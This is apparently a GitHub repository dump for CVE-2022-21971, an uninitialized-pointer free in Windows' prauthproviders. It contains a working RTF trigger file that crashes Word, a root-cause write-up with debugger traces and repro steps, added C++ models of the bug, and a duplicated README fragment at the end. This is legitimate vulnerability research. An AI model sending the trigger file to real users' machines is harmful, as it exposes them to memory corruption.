├── pics
│   └── cve-2022-21971.gif
├── cve-2022-21971.rtf
├── LICENSE
└── README.md

--------------------------------------------------------------------------------
/pics/cve-2022-21971.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0vercl0k/CVE-2022-21971/HEAD/pics/cve-2022-21971.gif

--------------------------------------------------------------------------------
/cve-2022-21971.rtf:
--------------------------------------------------------------------------------
{\rtf1{\object\objocx{\*\objdata
01050000
02000000
1f000000
53656350726f7669646572732e574150584d4c53656350726f766964657200
00000000
00000000
01000000
41
01050000
00000000
}}}

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2022 Axel Souchet

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2022-21971: Uninitialized pointer free in prauthproviders


![Demo of CVE-2022-21971 in Word (pics/cve-2022-21971.gif)](pics/cve-2022-21971.gif)

## Root-cause

`WapAuthProvider::CreateInstance` allocates a `WapAuthProvider` object (0x78 bytes) and initializes it, but it does not initialize all of its state.

The pointer at offset 0x50 is left uninitialized and is freed when the destructor (`WapAuthProvider::~WapAuthProvider`) runs. Under page heap the slot still holds the allocator's `0xc0` fill pattern for never-written memory, and that is the value handed to `LocalFree`:

```
prauthproviders!WapAuthProvider::~WapAuthProvider+0x38:
00007ffd`a91f3078 488b4b50        mov     rcx,qword ptr [rbx+50h] ds:000001cf`efe35fd0=c0c0c0c0c0c0c0c0

0:011>
prauthproviders!WapAuthProvider::~WapAuthProvider+0x3c:
00007ffd`a91f307c 4883634000      and     qword ptr [rbx+40h],0 ds:000001cf`efe35fc0=0000000000000000

0:011>
prauthproviders!WapAuthProvider::~WapAuthProvider+0x41:
00007ffd`a91f3081 48ff1578ad0000  call    qword ptr [prauthproviders!_imp_LocalFree (00007ffd`a91fde00)] ds:00007ffd`a91fde00={KERNELBASE!LocalFree (00007ffd`ccdb0620)}
```

This is the function that uses the uninitialized data, see `[0]` and `[1]`:

```c++
void WapAuthProvider::~WapAuthProvider(__int64 this) {
  void *v2; // rcx
  void *v3; // rcx

  *(_QWORD *)this = &WapAuthProvider::`vftable';
  LocalFree(*(HLOCAL *)(this + 56));   // +0x38, set up by CreateInstance
  v2 = *(void **)(this + 64);          // +0x40, set up by CreateInstance
  *(_QWORD *)(this + 56) = 0i64;
  LocalFree(v2);
  v3 = *(void **)(this + 80);          // <-- [0] +0x50, uninitialized
  *(_QWORD *)(this + 64) = 0i64;
  LocalFree(v3);                       // <-- [1] free
  *(_QWORD *)(this + 80) = 0i64;
}
```

## Repro

1. Turn on PageHeap via Gflags on `winword.exe`
2. Start Word and attach a debugger to it
3. Open `cve-2022-21971.rtf` in Word

```
(1c84.11b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
verifier!AVrfpDphFindBusyMemoryNoCheck+0x8a:
00007ffd`78d84742 817ac0bbbbcdab  cmp     dword ptr [rdx-40h],0ABCDBBBBh ds:c0c0c0c0`c0c0c080=????????

0:011> kc
 # Call Site
00 verifier!AVrfpDphFindBusyMemoryNoCheck
01 verifier!AVrfpDphFindBusyMemory
02 verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList
03 verifier!AVrfDebugPageHeapFree
04 ntdll!RtlDebugFreeHeap
05 ntdll!RtlpFreeHeap
06 ntdll!RtlpFreeHeapInternal
07 ntdll!RtlFreeHeap
08 KERNELBASE!LocalFree
09 prauthproviders!WapAuthProvider::~WapAuthProvider
0a prauthproviders!WapAuthProvider::`vector deleting destructor'
0b prauthproviders!WapAuthProvider::Release
0c prauthproviders!CClassFactory::CreateInstance
0d combase!CServerContextActivator::CreateInstance
0e combase!ActivationPropertiesIn::DelegateCreateInstance
0f combase!CApartmentActivator::CreateInstance
```

The access violation fires inside the page heap free path: `LocalFree` receives the `c0c0c0c0c0c0c0c0` garbage as a block address and the verifier dereferences it (0x40 bytes below the user block) looking for the `0xABCDBBBB` block-header stamp. Note from the stack that the object is released straight from `CClassFactory::CreateInstance`, so merely activating the class is enough to reach the destructor.

I've reproduced this on a Windows 10 x64 VM and on Windows 11 x64, with both WordPad (which requires one click) and Office Word 2019.

--------------------------------------------------------------------------------
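To make the root cause above concrete, here is an added example that is not code from this repository or from `prauthproviders.dll`: a portable C++ model of the object layout and of the destructor's order of operations, run once with the factory leaving the `+0x50` slot untouched (the shipped behaviour) and once with the slot cleared. The 0x78-byte size, the pointer offsets and the `0xc0` fill are taken from the disassembly on this page; the fake `LocalFree`, the 16-byte buffers and the `complete` flag are assumptions made for the demonstration.

```cpp
// Added example (not code from the 0vercl0k/CVE-2022-21971 repository): a
// portable model of the uninitialized-pointer free in
// WapAuthProvider::~WapAuthProvider. x64 layout only.
// Build: g++ -std=c++17 -O2 uninit_free_model.cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <new>
#include <set>
#include <vector>

// Stand-in for KERNELBASE!LocalFree (assumption). Like the real API it accepts
// nullptr; unlike it, it records a pointer it never handed out instead of
// letting the heap walk garbage, which is what verifier!AVrfpDphFindBusyMemory
// crashes on under page heap.
struct FakeLocalHeap {
    std::set<void*> live;            // blocks this heap currently owns
    std::vector<uintptr_t> bogus;    // freed pointers this heap never allocated
    void* alloc(size_t n) { void* p = ::operator new(n); live.insert(p); return p; }
    void free(void* p) {
        if (p == nullptr) return;
        if (live.erase(p)) { ::operator delete(p); return; }
        bogus.push_back(reinterpret_cast<uintptr_t>(p));
    }
};
static FakeLocalHeap g_heap;

// Object layout taken from the decompiled destructor: vtable at +0, three
// LocalAlloc'd buffers at +0x38, +0x40 and +0x50, 0x78 bytes in total.
struct WapAuthProviderModel {
    void*   vtable;
    uint8_t pad0[0x30];
    void*   buf38;
    void*   buf40;
    uint8_t pad1[8];
    void*   buf50;                  // the slot CreateInstance never writes
    uint8_t pad2[0x78 - 0x58];
};
static_assert(sizeof(WapAuthProviderModel) == 0x78, "object is 0x78 bytes");
static_assert(offsetof(WapAuthProviderModel, buf50) == 0x50, "pointer at +0x50");

// The value page heap leaves in a fresh, never-written allocation (0xC0 fill).
uintptr_t page_heap_fill() {
    uintptr_t v; std::memset(&v, 0xC0, sizeof v); return v;
}

// Models WapAuthProvider::CreateInstance. `complete == false` is the shipped
// behaviour: +0x38 and +0x40 are set up, +0x50 is left as allocated.
static WapAuthProviderModel* create_instance(bool complete) {
    void* raw = ::operator new(sizeof(WapAuthProviderModel));
    std::memset(raw, 0xC0, sizeof(WapAuthProviderModel));   // what full page heap does to a new block
    auto* o = static_cast<WapAuthProviderModel*>(raw);
    o->vtable = nullptr;
    o->buf38 = g_heap.alloc(16);                            // buffer sizes are assumptions
    o->buf40 = g_heap.alloc(16);
    if (complete) o->buf50 = nullptr;                       // the missing initialization
    return o;
}

// Same order of operations as the decompiled ~WapAuthProvider.
static void destroy_instance(WapAuthProviderModel* o) {
    g_heap.free(o->buf38);
    void* v2 = o->buf40; o->buf38 = nullptr;
    g_heap.free(v2);
    void* v3 = o->buf50; o->buf40 = nullptr;   // [0] reads the uninitialized slot
    g_heap.free(v3);                           // [1] hands it to LocalFree
    o->buf50 = nullptr;
    ::operator delete(o);
}

// Runs create -> immediate release (the CClassFactory::CreateInstance path in
// the crash stack) and returns the first bogus pointer that reached LocalFree,
// or 0 if every freed pointer was either a real block or nullptr.
uintptr_t run_model(bool complete) {
    g_heap = FakeLocalHeap{};
    destroy_instance(create_instance(complete));
    return g_heap.bogus.empty() ? 0 : g_heap.bogus.front();
}

// True when the model freed exactly the buffers it allocated (no leak).
bool heap_balanced() { return g_heap.live.empty(); }

int main() {
    std::printf("unpatched: LocalFree(%#llx)\n", (unsigned long long)run_model(false)); // LocalFree(0xc0c0c0c0c0c0c0c0)
    std::printf("patched:   bogus=%#llx\n", (unsigned long long)run_model(true));       // bogus=0
    return 0;
}
```

The model shows why the fix is a one-liner in the factory (clear the slot, or value-initialize the object) rather than in the destructor: `LocalFree(NULL)` is already a harmless no-op, so once the member starts out as `NULL` the existing teardown is correct.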
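The trigger in `cve-2022-21971.rtf` is nothing more than an OLE1 object header naming a ProgID: Word resolves the class name, activates it through COM, and the crash stack above does the rest. The decoder below is an added example, not part of the repository, that walks the `\objdata` stream field by field; the field names follow the OLE1 `ObjectHeader` / `EmbeddedObject` layout ([MS-OLEDS]), the hex is copied from the RTF on this page, and the truncated input used for the robustness check is constructed.

```cpp
// Added example (not code from the 0vercl0k/CVE-2022-21971 repository): a
// decoder for the OLE1 \objdata stream carried by cve-2022-21971.rtf.
// Build: g++ -std=c++17 objdata.cpp
#include <cctype>
#include <cstdint>
#include <cstdio>
#include <stdexcept>
#include <string>
#include <vector>

struct Ole1Object {
    uint32_t ole_version = 0;
    uint32_t format_id = 0;           // 1 = linked object, 2 = embedded object
    std::string class_name;           // ProgID the consumer activates via COM
    std::string topic_name, item_name;
    std::string native_data;          // opaque bytes handed to the object
    uint32_t presentation_format = 0; // trailing PresentationObjectHeader.FormatID (0 = none)
};

// Hex text of \objdata as it appears in cve-2022-21971.rtf (whitespace is ignored).
const char* kPocObjData =
    "01050000"
    "02000000"
    "1f000000"
    "53656350726f7669646572732e574150584d4c53656350726f766964657200"
    "00000000"
    "00000000"
    "01000000"
    "41"
    "01050000"
    "00000000";

std::vector<uint8_t> decode_hex(const std::string& text) {
    std::vector<uint8_t> out;
    int hi = -1;
    for (unsigned char c : text) {
        if (std::isspace(c)) continue;
        if (!std::isxdigit(c)) throw std::runtime_error("non-hex byte in objdata");
        int v = std::isdigit(c) ? c - '0' : std::tolower(c) - 'a' + 10;
        if (hi < 0) { hi = v; } else { out.push_back(uint8_t(hi << 4 | v)); hi = -1; }
    }
    if (hi >= 0) throw std::runtime_error("odd hex digit count");
    return out;
}

// Bounds-checked little-endian reader over the decoded bytes.
class Cursor {
    const std::vector<uint8_t>& b; size_t pos = 0;
public:
    explicit Cursor(const std::vector<uint8_t>& buf) : b(buf) {}
    void need(size_t n) const { if (b.size() - pos < n) throw std::runtime_error("truncated objdata"); }
    uint32_t u32() {
        need(4);
        uint32_t v = uint32_t(b[pos]) | uint32_t(b[pos + 1]) << 8 |
                     uint32_t(b[pos + 2]) << 16 | uint32_t(b[pos + 3]) << 24;
        pos += 4; return v;
    }
    std::string bytes(size_t n) { need(n); std::string s(b.begin() + pos, b.begin() + pos + n); pos += n; return s; }
    // LengthPrefixedAnsiString: u32 length that includes the NUL, then the bytes.
    std::string ansi() {
        uint32_t n = u32();
        if (n == 0) return "";
        std::string s = bytes(n);
        if (s.back() != '\0') throw std::runtime_error("string not NUL-terminated");
        s.pop_back(); return s;
    }
    bool done() const { return pos == b.size(); }
};

Ole1Object parse_objdata(const std::string& hex) {
    std::vector<uint8_t> raw = decode_hex(hex);
    Cursor c(raw);
    Ole1Object o;
    o.ole_version = c.u32();
    o.format_id   = c.u32();
    o.class_name  = c.ansi();
    o.topic_name  = c.ansi();
    o.item_name   = c.ansi();
    if (o.format_id == 2) o.native_data = c.bytes(c.u32());  // NativeDataSize + NativeData
    if (!c.done()) {                                          // optional PresentationObjectHeader
        c.u32();                                              // its OLEVersion
        o.presentation_format = c.u32();
    }
    return o;
}

// Parser-robustness helper: false when the stream is malformed or truncated.
bool objdata_is_wellformed(const std::string& hex) {
    try { parse_objdata(hex); return true; } catch (const std::exception&) { return false; }
}

int main() {
    Ole1Object o = parse_objdata(kPocObjData);
    std::printf("OLEVersion=%#x FormatID=%u ClassName=\"%s\" NativeDataSize=%zu PresentationFormatID=%u\n",
                unsigned(o.ole_version), unsigned(o.format_id), o.class_name.c_str(),
                o.native_data.size(), unsigned(o.presentation_format));
    return 0;
}
```

The decoded header is an embedded object whose class name is `SecProviders.WAPXMLSecProvider` with one byte of native data and no presentation data, which is why the PoC fits in twelve lines: the payload is irrelevant, only the class activation matters.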
55 | verifier!AVrfpDphFindBusyMemoryNoCheck+0x8a: 56 | 00007ffd`78d84742 817ac0bbbbcdab cmp dword ptr [rdx-40h],0ABCDBBBBh ds:c0c0c0c0`c0c0c080=???????? 57 | 58 | 0:011> kc 59 | # Call Site 60 | 00 verifier!AVrfpDphFindBusyMemoryNoCheck 61 | 01 verifier!AVrfpDphFindBusyMemory 62 | 02 verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList 63 | 03 verifier!AVrfDebugPageHeapFree 64 | 04 ntdll!RtlDebugFreeHeap 65 | 05 ntdll!RtlpFreeHeap 66 | 06 ntdll!RtlpFreeHeapInternal 67 | 07 ntdll!RtlFreeHeap 68 | 08 KERNELBASE!LocalFree 69 | 09 prauthproviders!WapAuthProvider::~WapAuthProvider 70 | 0a prauthproviders!WapAuthProvider::`vector deleting destructor' 71 | 0b prauthproviders!WapAuthProvider::Release 72 | 0c prauthproviders!CClassFactory::CreateInstance 73 | 0d combase!CServerContextActivator::CreateInstance 74 | 0e combase!ActivationPropertiesIn::DelegateCreateInstance 75 | 0f combase!CApartmentActivator::CreateInstance 76 | ``` 77 | 78 | I've reproduced this on a Windows 10 x64 VM and on Windows 11 x64 with both Wordpad (but requires one click) and Office Word 2019. 79 | --------------------------------------------------------------------------------